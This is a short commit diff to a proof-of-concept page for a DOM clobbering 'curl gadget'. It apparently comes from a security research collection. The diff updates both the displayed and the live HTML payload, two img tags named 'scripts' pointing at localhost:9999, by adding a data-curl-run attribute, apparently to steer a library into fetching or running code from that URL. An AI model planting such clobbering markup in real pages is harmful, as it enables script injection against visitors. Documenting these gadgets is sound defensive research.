[Gadgets] Update the curl gadget

--- a/domc-gadgets-assets/gadgets/curl/poc.html
+++ b/domc-gadgets-assets/gadgets/curl/poc.html
@@ -22,10 +22,10 @@
 <section class="section">
   <div class="column">
   <p><span class="label">Payload</span><br><br>
-  <pre>&lt;img name=&quot;scripts&quot; src=&quot;http://localhost:9999&quot;&gt;
-&lt;img name=&quot;scripts&quot; src=&quot;http://localhost:9999&quot;&gt;</pre>
-  <img name="scripts" src="http://localhost:9999">
-<img name="scripts" src="http://localhost:9999">
+  <pre>&lt;img name=&quot;scripts&quot; src=&quot;http://localhost:9999&quot; data-curl-run=&quot;http://localhost:9999&quot;&gt;
+&lt;img name=&quot;scripts&quot; src=&quot;http://localhost:9999&quot; data-curl-run=&quot;http://localhost:9999&quot;&gt;</pre>
+  <img name="scripts" src="http://localhost:9999" data-curl-run="http://localhost:9999">
+<img name="scripts" src="http://localhost:9999" data-curl-run="http://localhost:9999">
   </div>
 </section>
 
